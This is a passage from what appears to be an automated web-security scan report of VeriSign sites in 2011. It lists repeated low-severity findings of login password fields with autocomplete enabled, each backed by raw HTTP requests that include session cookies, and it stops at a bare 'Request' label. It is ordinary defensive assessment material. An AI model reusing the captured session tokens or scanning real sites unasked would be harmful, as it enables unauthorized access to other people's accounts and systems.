GET /geocenter/reseller/register.do?partner=verisignamerica HTTP/1.1 Host: products.verisign.com Connection: keep-alive Referer: http://www.verisign.com/partners/ssl-reseller-programs/resell-ssl/enrollment/index.html User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; JSESSIONID=hhyjTqGBLMJv7h9GbgyHDvJq3QYY5gY8yGM9GyGkjbGQWTH48hf1!1264420788; mbox=session#1315621455064-973488#1315623594|PC#1315621455064-973488.19#1378693734|check#true#1315621794; IS3_GSV=DPL-2_TES-1315621562_PCT-1315621562_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.10.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315509977-3-99____
Response
HTTP/1.1 200 OK Cache-Control: no-cache Date: Fri, 09 Sep 2011 21:28:28 GMT Pragma: No-cache Content-Type: text/html;charset=UTF-8 Expires: Thu, 01 Jan 1970 00:00:00 GMT X-Powered-By: Servlet/2.5 JSP/2.1 Content-Length: 17095 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <link href="/geocenter/style_verisign.css" type=text/css rel="STYLES...[SNIP]... <td width="600" valign="top"> <form name="logonForm" method="post" action="/geocenter/reseller/logon.do" accept-charset="UTF-8"> <table>...[SNIP]... <td> <input type="password" name="password" maxlength="20" size="16" value="" style="width:130px;"> </td>...[SNIP]...
11.21. http://query.verisign.ch/search
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://query.verisign.ch
Path:
/search
Issue detail
The page contains a form with the following action URL:https://products.verisign.com/geocenter/reseller/logon.do The form contains the following password field with autocomplete enabled:
Request
GET /search HTTP/1.1 Host: query.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:46:19 GMT Server: saws Cache-Control: private Content-Type: text/html Content-Length: 43489 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html><head> <meta name="robots" content="NOINDEX,NOFOLLOW"> <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7"> <meta http...[SNIP]... <div class="partner_form"> <form name="logonForm" id="partner_login" method="post" action="https://products.verisign.com/geocenter/reseller/logon.do" target="_blank"> <div>...[SNIP]... </label> <input type="password"id="partner_password" name="password" size="16" maxlength="20" /> </div>...[SNIP]...
11.22. http://query.verisign.com/search
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://query.verisign.com
Path:
/search
Issue detail
The page contains a form with the following action URL:https://test-products.verisign.com/geocenter/reseller/logon.do The form contains the following password field with autocomplete enabled:
Request
GET /search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend HTTP/1.1 Host: query.verisign.com Proxy-Connection: keep-alive Referer: http://www.verisign.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; mbox=check#true#1315621567|session#1315621455064-973488#1315623367|PC#1315621455064-973488.19#1378693507; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:07 GMT Server: saws Cache-Control: private Content-Type: text/html Vary: Accept-Encoding Content-Length: 52678 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html><head> <meta name="robots" content="NOINDEX,NOFOLLOW"> <meta http-equiv="X-UA-Compatible" content="IE=7"> <meta http-equiv="c...[SNIP]... <div class="partner_form"> <form name="logonForm" id="partner_login" method="post" action="https://test-products.verisign.com/geocenter/reseller/logon.do" target="_blank"> <div>...[SNIP]... </label> <input type="password"id="partner_password" name="password" size="16" maxlength="20" /> </div>...[SNIP]...
11.23. https://query.verisign.com/search
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
https://query.verisign.com
Path:
/search
Issue detail
The page contains a form with the following action URL:https://test-products.verisign.com/geocenter/reseller/logon.do The form contains the following password field with autocomplete enabled:
Request
GET /search HTTP/1.1 Host: query.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:46:20 GMT Server: saws Cache-Control: private Content-Type: text/html Content-Length: 44676 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html><head> <meta name="robots" content="NOINDEX,NOFOLLOW"> <meta http-equiv="X-UA-Compatible" content="IE=7"> <meta http-equiv="c...[SNIP]... <div class="partner_form"> <form name="logonForm" id="partner_login" method="post" action="https://test-products.verisign.com/geocenter/reseller/logon.do" target="_blank"> <div>...[SNIP]... </label> <input type="password"id="partner_password" name="password" size="16" maxlength="20" /> </div>...[SNIP]...
11.24. https://ssl-certificate-center.verisign.ch/process/retail/console_login
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
https://ssl-certificate-center.verisign.ch
Path:
/process/retail/console_login
Issue detail
The page contains a form with the following action URL:https://ssl-certificate-center.verisign.ch/process/retail/console_login.do The form contains the following password field with autocomplete enabled:enrollment.account.password
Request
GET /process/retail/console_login HTTP/1.1 Host: ssl-certificate-center.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:46:42 GMT Server: Apache Set-Cookie: TLTHID=34B2B6D6DB2D10DB60D0D1C1D953344E; Path=/; Domain=.verisign.ch Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0 Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=utf-8 Content-Length: 11755 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF...[SNIP]... <div id="left_panel"><form name="accountSigninForm" action="/process/retail/console_login.do" method="post"> <input name="referrerPath" type="hidden" value="">...[SNIP]... </script><input name="enrollment.account.password" type="password" id="password" class="text_input" maxlength="30" tabindex="2"> <script language="JavaScript">...[SNIP]...
11.25. https://ssl-certificate-center.verisign.com/process/retail/console_login
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
https://ssl-certificate-center.verisign.com
Path:
/process/retail/console_login
Issue detail
The page contains a form with the following action URL:https://ssl-certificate-center.verisign.com/process/retail/console_login.do The form contains the following password field with autocomplete enabled:enrollment.account.password
Request
GET /process/retail/console_login HTTP/1.1 Host: ssl-certificate-center.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:46:43 GMT Server: Apache Set-Cookie: TLTHID=35539628DB2D10DB528F9F6CAED9DACC; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0 Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=utf-8 Content-Length: 11759 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF...[SNIP]... <div id="left_panel"><form name="accountSigninForm" action="/process/retail/console_login.do" method="post"> <input name="referrerPath" type="hidden" value="">...[SNIP]... </script><input name="enrollment.account.password" type="password" id="password" class="text_input" maxlength="30" tabindex="2"> <script language="JavaScript">...[SNIP]...
11.26. https://test-products.verisign.com/geocenter/reseller/logon.do
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
https://test-products.verisign.com
Path:
/geocenter/reseller/logon.do
Issue detail
The page contains a form with the following action URL:https://test-products.verisign.com/geocenter/reseller/logon.do The form contains the following password field with autocomplete enabled:
Request
GET /geocenter/reseller/logon.do HTTP/1.1 Host: test-products.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 09 Sep 2011 21:46:46 GMT Content-Type: text/html;charset=UTF-8 Content-Length: 17100 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <link href="/geocenter/style_verisign.css" type=text/css rel="STYLES...[SNIP]... <td width="600" valign="top"> <form name="logonForm" method="post" action="/geocenter/reseller/logon.do" accept-charset="UTF-8"> <table>...[SNIP]... <td> <input type="password" name="password" maxlength="20" size="16" value="" style="width:130px;"> </td>...[SNIP]...
11.27. https://trust-center.verisign.ch/process/retail/console_login
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
https://trust-center.verisign.ch
Path:
/process/retail/console_login
Issue detail
The page contains a form with the following action URL:https://trust-center.verisign.ch/process/retail/console_login.do The form contains the following password field with autocomplete enabled:enrollment.account.password
Request
GET /process/retail/console_login HTTP/1.1 Host: trust-center.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:46:46 GMT Server: Apache Set-Cookie: TLTHID=37115F40DB2D10DB60DAD1C1D953344E; Path=/; Domain=.verisign.ch Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0 Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=utf-8 Content-Length: 11715 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF...[SNIP]... <div id="left_panel"><form name="accountSigninForm" action="/process/retail/console_login.do" method="post"> <input name="referrerPath" type="hidden" value="">...[SNIP]... </script><input name="enrollment.account.password" type="password" id="password" class="text_input" maxlength="30" tabindex="2"> <script language="JavaScript">...[SNIP]...
11.28. https://trust-center.verisign.com/process/retail/console_login
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/process/retail/console_login
Issue detail
The page contains a form with the following action URL:https://trust-center.verisign.com/process/retail/console_login.do The form contains the following password field with autocomplete enabled:enrollment.account.password
Request
GET /process/retail/console_login HTTP/1.1 Host: trust-center.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:46:48 GMT Server: Apache Set-Cookie: TLTHID=383DEE10DB2D10DB49FEB1847A7DDBAF; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0 Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=utf-8 Content-Length: 12062 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF...[SNIP]... <div id="left_panel"><form name="accountSigninForm" action="/process/retail/console_login.do" method="post"> <input name="referrerPath" type="hidden" value="">...[SNIP]... </script><input name="enrollment.account.password" type="password" id="password" class="text_input" maxlength="30" tabindex="2"> <script language="JavaScript">...[SNIP]...
11.29. http://www.verisign.ch/
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://www.verisign.ch
Path:
/
Issue detail
The page contains a form with the following action URL:https://products.verisign.com/geocenter/reseller/logon.do The form contains the following password field with autocomplete enabled:
Request
GET /?tid=header-logo HTTP/1.1 Host: www.verisign.ch Proxy-Connection: keep-alive Referer: http://www.verisign.ch/contact-information/index.html?tid=footer User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=85AC46EBE3E5BE40; mbox=check#true#1315621600|session#1315621535113-743172#1315623400; __utma=173548476.138500938.1315621535.1315621535.1315621535.1; __utmb=173548476.2.10.1315621535; __utmc=173548476; __utmz=173548476.1315621535.1.1.utmcsr=query.verisign.com|utmccn=(referral)|utmcmd=referral|utmcct=/search
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:10 GMT Server: Apache X-Powered-By: PHP/5.2.13 X-UA-Compatible: IE=EmulateIE7 Content-Type: text/html Content-Length: 31344 <!DOCTYPE html> <html lang=""> <head> <title>VeriSign Authentication Services - The leading Provider of SSL. Products include SSL, SSL Certificates, Extended Validation (EV SSL), VeriSign Trust Sea...[SNIP]... <div class="partner_form"> <form name="logonForm" id="partner_login" method="post" action="https://products.verisign.com/geocenter/reseller/logon.do" target="_blank"> <div>...[SNIP]... </label> <input type="password"id="partner_password" name="password" size="16" maxlength="20" /> </div>...[SNIP]...
11.30. http://www.verisign.ch/contact-information/index.html
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://www.verisign.ch
Path:
/contact-information/index.html
Issue detail
The page contains a form with the following action URL:https://products.verisign.com/geocenter/reseller/logon.do The form contains the following password field with autocomplete enabled:
Request
GET /contact-information/index.html?tid=footer HTTP/1.1 Host: www.verisign.ch Proxy-Connection: keep-alive Referer: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=85AC46EBE3E5BE40
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:10 GMT Server: Apache X-Powered-By: PHP/5.2.13 X-UA-Compatible: IE=EmulateIE7 Content-Type: text/html Content-Length: 39107 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <link rel="stylesheet" href="/assets/corp/css/corp_generic_st...[SNIP]... <div class="partner_form"> <form name="logonForm" id="partner_login" method="post" action="https://products.verisign.com/geocenter/reseller/logon.do" target="_blank"> <div>...[SNIP]... </label> <input type="password"id="partner_password" name="password" size="16" maxlength="20" /> </div>...[SNIP]...
11.31. http://www.verisign.ch/corporate/index.html
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://www.verisign.ch
Path:
/corporate/index.html
Issue detail
The page contains a form with the following action URL:https://products.verisign.com/geocenter/reseller/logon.do The form contains the following password field with autocomplete enabled:
Request
GET /corporate/index.html?tid=footer HTTP/1.1 Host: www.verisign.ch Proxy-Connection: keep-alive Referer: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=85AC46EBE3E5BE40; mbox=check#true#1315621596|session#1315621535113-743172#1315623396; __utma=173548476.138500938.1315621535.1315621535.1315621535.1; __utmb=173548476.1.10.1315621535; __utmc=173548476; __utmz=173548476.1315621535.1.1.utmcsr=query.verisign.com|utmccn=(referral)|utmcmd=referral|utmcct=/search
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:10 GMT Server: Apache X-Powered-By: PHP/5.2.13 X-UA-Compatible: IE=EmulateIE7 Content-Type: text/html Content-Length: 36193 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html> <head> <script type="text/JavaScript" src="http://cdn.verisign.com/stellent/fragments/vrsnJSAssets/vrsnMainJSScripts.js" languag...[SNIP]... <div class="partner_form"> <form name="logonForm" id="partner_login" method="post" action="https://products.verisign.com/geocenter/reseller/logon.do" target="_blank"> <div>...[SNIP]... </label> <input type="password"id="partner_password" name="password" size="16" maxlength="20" /> </div>...[SNIP]...
11.32. http://www.verisign.ch/trust-seal/index.html
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://www.verisign.ch
Path:
/trust-seal/index.html
Issue detail
The page contains a form with the following action URL:https://products.verisign.com/geocenter/reseller/logon.do The form contains the following password field with autocomplete enabled:
Request
GET /trust-seal/index.html?tid=gnps HTTP/1.1 Host: www.verisign.ch Proxy-Connection: keep-alive Referer: http://www.verisign.ch/corporate/index.html?tid=footer User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=85AC46EBE3E5BE40; mbox=check#true#1315621625|session#1315621535113-743172#1315623425|PC#1315621455064-973488.19#1378693568; __utma=173548476.138500938.1315621535.1315621535.1315621535.1; __utmb=173548476.3.10.1315621535; __utmc=173548476; __utmz=173548476.1315621535.1.1.utmcsr=query.verisign.com|utmccn=(referral)|utmcmd=referral|utmcct=/search
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:10 GMT Server: Apache X-Powered-By: PHP/5.2.13 X-UA-Compatible: IE=EmulateIE7 Content-Type: text/html Content-Length: 50059 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>VeriSign Trust Seal - Perfec...[SNIP]... <div class="partner_form"> <form name="logonForm" id="partner_login" method="post" action="https://products.verisign.com/geocenter/reseller/logon.do" target="_blank"> <div>...[SNIP]... </label> <input type="password"id="partner_password" name="password" size="16" maxlength="20" /> </div>...[SNIP]...
11.33. http://www.verisign.com/
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://www.verisign.com
Path:
/
Issue detail
The page contains a form with the following action URL:https://products.verisign.com/geocenter/reseller/logon.do The form contains the following password field with autocomplete enabled:
Request
GET / HTTP/1.1 Host: www.verisign.com Proxy-Connection: keep-alive Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; mbox=check#true#1315621516|session#1315621455064-973488#1315623316|PC#1315621455064-973488.19#1378693458; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.1.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:24:37 GMT Server: Apache X-Powered-By: PHP/5.2.13 Expires: Sun, 09 Oct 2011 21:24:37 GMT Content-Type: text/html Content-Length: 34615 <!DOCTYPE html> <html lang=""> <head> <title>VeriSign Authentication Services - The leading Provider of SSL. Products include SSL, SSL Certificates, Extended Validation (EV SSL), VeriSign Trust Sea...[SNIP]... <div class="partner_form"> <form name="logonForm" id="partner_login" method="post" action="https://products.verisign.com/geocenter/reseller/logon.do" target="_blank"> <div>...[SNIP]... </label> <input type="password"id="partner_password" name="password" size="16" maxlength="20" /> </div>...[SNIP]...
11.34. http://www.verisign.com/assets/trust-seal/images/FreeTrialButton-hover.png,/assets/trust-seal/images/BuyButton-hover.png,/assets/trust-seal/images/omer-png8.png,/assets/trust-seal/images/hadleigh-png8.png,/assets/trust-seal/images/diane-png8.png,/assets/trust-seal/images/matthew-png8.png
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://www.verisign.com
Path:
/assets/trust-seal/images/FreeTrialButton-hover.png,/assets/trust-seal/images/BuyButton-hover.png,/assets/trust-seal/images/omer-png8.png,/assets/trust-seal/images/hadleigh-png8.png,/assets/trust-seal/images/diane-png8.png,/assets/trust-seal/images/matthew-png8.png
Issue detail
The page contains a form with the following action URL:https://products.verisign.com/geocenter/reseller/logon.do The form contains the following password field with autocomplete enabled:
Request
GET /assets/trust-seal/images/FreeTrialButton-hover.png,/assets/trust-seal/images/BuyButton-hover.png,/assets/trust-seal/images/omer-png8.png,/assets/trust-seal/images/hadleigh-png8.png,/assets/trust-seal/images/diane-png8.png,/assets/trust-seal/images/matthew-png8.png HTTP/1.1 Host: www.verisign.com Proxy-Connection: keep-alive Referer: http://www.verisign.com/trust-seal/index.html?tid=gnps User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.3.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581
Response
HTTP/1.1 404 Not Found Date: Fri, 09 Sep 2011 21:26:14 GMT Server: Apache X-Powered-By: PHP/5.2.13 Content-Type: text/html Content-Length: 77864 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html> <head> <!--HEADER ASSETS--> <link href="http://cdn.verisign.com/assets/shared/css/header.css" rel="stylesheet" /> <!--[if lte IE 7...[SNIP]... <div class="partner_form"> <form name="logonForm" id="partner_login" method="post" action="https://products.verisign.com/geocenter/reseller/logon.do" target="_blank"> <div>...[SNIP]... </label> <input type="password"id="partner_password" name="password" size="16" maxlength="20" /> </div>...[SNIP]...
11.35. http://www.verisign.com/code-signing/index.html
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://www.verisign.com
Path:
/code-signing/index.html
Issue detail
The page contains a form with the following action URL:https://products.verisign.com/geocenter/reseller/logon.do The form contains the following password field with autocomplete enabled:
Request
GET /code-signing/index.html?tid=a_box HTTP/1.1 Host: www.verisign.com Proxy-Connection: keep-alive Referer: http://www.verisign.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTHID=6A3B7886DB2A10DB4D019F6CAED9DACC; mbox=session#1315621455064-973488#1315623513|PC#1315621455064-973488.19#1378693653|check#true#1315621713; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.6.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:27:08 GMT Server: Apache X-Powered-By: PHP/5.2.13 Expires: Sun, 09 Oct 2011 21:27:08 GMT Content-Type: text/html Content-Length: 103179 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <!--HEADER ASSETS...[SNIP]... <div class="partner_form"> <form name="logonForm" id="partner_login" method="post" action="https://products.verisign.com/geocenter/reseller/logon.do" target="_blank"> <div>...[SNIP]... </label> <input type="password"id="partner_password" name="password" size="16" maxlength="20" /> </div>...[SNIP]...
11.36. http://www.verisign.com/partners/ssl-reseller-programs/index.html
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://www.verisign.com
Path:
/partners/ssl-reseller-programs/index.html
Issue detail
The page contains a form with the following action URL:https://products.verisign.com/geocenter/reseller/logon.do The form contains the following password field with autocomplete enabled:
Request
GET /partners/ssl-reseller-programs/index.html HTTP/1.1 Host: www.verisign.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.7.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=session#1315621455064-973488#1315623565|PC#1315621455064-973488.19#1378693705|check#true#1315621765
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:28:13 GMT Server: Apache X-Powered-By: PHP/5.2.13 Expires: Sun, 09 Oct 2011 21:28:13 GMT Content-Type: text/html Content-Length: 51846 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html> <head> <!--HEADER ASSETS--> <link href="http://cdn.verisign.com/assets/shared/css/header.css" rel="stylesheet" /> <!--[if lte IE 7...[SNIP]... <div class="partner_form"> <form name="logonForm" id="partner_login" method="post" action="https://products.verisign.com/geocenter/reseller/logon.do" target="_blank"> <div>...[SNIP]... </label> <input type="password"id="partner_password" name="password" size="16" maxlength="20" /> </div>...[SNIP]...
11.37. http://www.verisign.com/partners/ssl-reseller-programs/resell-ssl/enrollment/index.html
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://www.verisign.com
Path:
/partners/ssl-reseller-programs/resell-ssl/enrollment/index.html
Issue detail
The page contains a form with the following action URL:https://products.verisign.com/geocenter/reseller/logon.do The form contains the following password field with autocomplete enabled:
Request
